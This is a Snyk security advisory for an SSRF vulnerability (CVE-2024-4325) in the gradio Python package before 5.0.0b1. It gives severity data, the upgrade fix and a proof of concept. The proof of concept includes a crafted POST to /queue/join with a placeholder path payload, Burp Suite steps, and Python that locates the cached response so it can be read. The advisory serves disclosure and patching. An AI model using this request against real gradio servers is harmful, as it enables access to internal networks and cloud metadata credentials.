Server-Side Request Forgery (SSRF) Affecting gradio package, versions [,5.0.0b1)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.08% (38th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Server-Side Request Forgery (SSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-GRADIO-7217838
  • published7 Jun 2024
  • disclosed6 Jun 2024
  • creditmvlttt

Introduced: 6 Jun 2024

CVE-2024-4325  (opens in a new tab)
CWE-918  (opens in a new tab)

How to fix?

Upgrade gradio to version 5.0.0b1 or higher.

Overview

gradio is a Python library for easily interacting with trained machine learning models

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF) through the /queue/join endpoint and the save_url_to_cache function. An attacker can gain unauthorized access to internal networks or the AWS metadata endpoint by sending crafted requests that exploit insufficient validation of the path parameter.

PoC

Run the following example found in Gradio's documentation:

import gradio as gr

def upload_file(files): file_paths = [file.name for file in files] return file_paths

with gr.Blocks() as demo: file_output = gr.File() upload_button = gr.UploadButton("Click to Upload an Image or Video File", file_types=["image", "video"], file_count="multiple") upload_button.upload(upload_file, upload_button, file_output)

demo.launch()

Get a webhook url for testing.

Stop the requests with Burp Suite and replace the path parameter of the request going to the "/queue/join" endpoint with the payload. e.g:

POST /queue/join? HTTP/1.1
Host: 127.0.0.1:7860
Content-Type: application/json
Content-Length: 318

{ "data": [ [ { "meta": { "_type": "gradio.FileData" }, "path": "PAYLOAD", "url": "http://127.0.0.1:7860/file=/tmp/gradio/d1be868eeb62e5194df165ccd8becbc5b3ffb299/favicon.ico", "orig_name": "favicon.ico", "size": 15406, "mime_type": "image/x-icon" } ] ], "event_data": null, "fn_index": 0, "trigger_id": 2, "session_hash": "l8v6ku4cm8d" }

You will see an http get request coming to your webhook url.

Make the following request using the sha1 hash of the url to view the output of the request:

import hashlib
from pathlib import Path

url="PAYLOAD" sha1 = hashlib.sha1() sha1.update(url.encode("utf-8"))

print(f"http://127.0.0.1:7860/file=/tmp/gradio/{sha1.hexdigest()}/{Path(url).name}")

CVSS Scores

version 3.1